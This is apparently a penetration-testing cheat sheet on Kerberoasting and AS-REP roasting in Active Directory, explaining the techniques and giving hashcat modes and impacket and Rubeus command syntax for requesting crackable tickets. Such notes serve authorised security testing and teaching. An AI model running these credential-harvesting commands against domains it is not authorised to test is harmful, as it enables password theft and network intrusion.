# Roasting

## Kerberoasting

In Active Directory, Service Tickets can be requested by any authenticated domain user for any domain account tied to a service using a Service Principal Name (SPN).

Service Tickets are partially encrypted with the Kerberos key (derived from the account password) of the account tied to the service. Thus, you can try to crack the service account password by trying to decrypt the ST.

{% hint style="info" %}
The hashcat mode for the default RC4 encrypted TGS-REP ticket is 13100
{% endhint %}

{% tabs %}
{% tab title="impacket-getUserSPNs" %}
{% embed url="<https://github.com/fortra/impacket>" %}

{% code title="Linux (Attacker)" %}

```fish
getUserSPNs.py [domain/username]<:password> <options>

OPTIONS
-hashes [LMHASH:NTHASH]            NTLM Hashes, Format is LMHASH:NTHASH
-dc-ip [IP]                        IP Address Of The Domain Controller
-outputfile [file]                 Output Filename
-request                           Requests TGS For Users
-format                            Hashcat | John
```

{% endcode %}
{% endtab %}

{% tab title="Rubeus" %}
{% embed url="<https://github.com/GhostPack/Rubeus#kerberoast>" %}

{% code title="Windows" %}

```powershell
Rubeus.exe kerberoast <options>

OPTIONS
/spn:                    Kerberoast Only A Specific SPN
/user:                   Kerberoast Only A Specific User
/outfile:                Writes Kerberoasted Hashes To A File
/nowrap                  Don't Wrap Kerberoast Results (Easier For Copy Paste)
/tgtdeleg                Request RC4 Tickets From Accounts With AES Enabled 
/rc4opsec                Only Kerberoast Accounts Without AES Enabled
```

{% endcode %}
{% endtab %}
{% endtabs %}

## ASREP-Roasting

In Kerberos Authentication, users typically need to perform Kerberos Pre-Authentication by sending a timestamp encrypted with the user's Kerberos key (derived from the account password) to the KDC.

If Kerberos Pre-Authentication is disabled for an account by setting the *DONT\_REQUIRE\_PREAUTH* flag, an attacker can impersonate the account by requesting a TGT from the KDC as the account. The KDC's **AS-REP** response will include a session key encrypted with the account's Kerberos key. This session key can then be cracked to obtain the account's password.

{% hint style="info" %}
The hashcat mode for the AS-REP ticket is 18200
{% endhint %}

{% tabs %}
{% tab title="impacket-getNPUsers" %}
{% embed url="<https://github.com/fortra/impacket>" %}

{% code title="Linux" %}

```bash
GetNPUsers.py [domain/username]<:password> <options>

OPTIONS
-hashes [LMHASH:NTHASH]            NTLM Hashes, Format is LMHASH:NTHASH
-dc-ip [ip]                        IP Address Of The Domain Controller
-outputfile [file]                 Output Filename
-request                           Requests AS-REP For Users
-format                            Hashcat | John
```

{% endcode %}
{% endtab %}

{% tab title="Rubeus" %}
{% embed url="<https://github.com/GhostPack/Rubeus#kerberoast>" %}

{% code title="Windows" %}

```bash
Rubeus.exe asreproast <options>

OPTIONS
/user:                   ASREP-Roast Only A Specific User
/format:                 Output ASREP-Roast Format (Default: John The Ripper)
/outfile:                Writes Kerberoasted Hashes To A File
/nowrap                  Don't Wrap ASREP-Roast Results (Easier For Copy Paste)
```

{% endcode %}
{% endtab %}
{% endtabs %}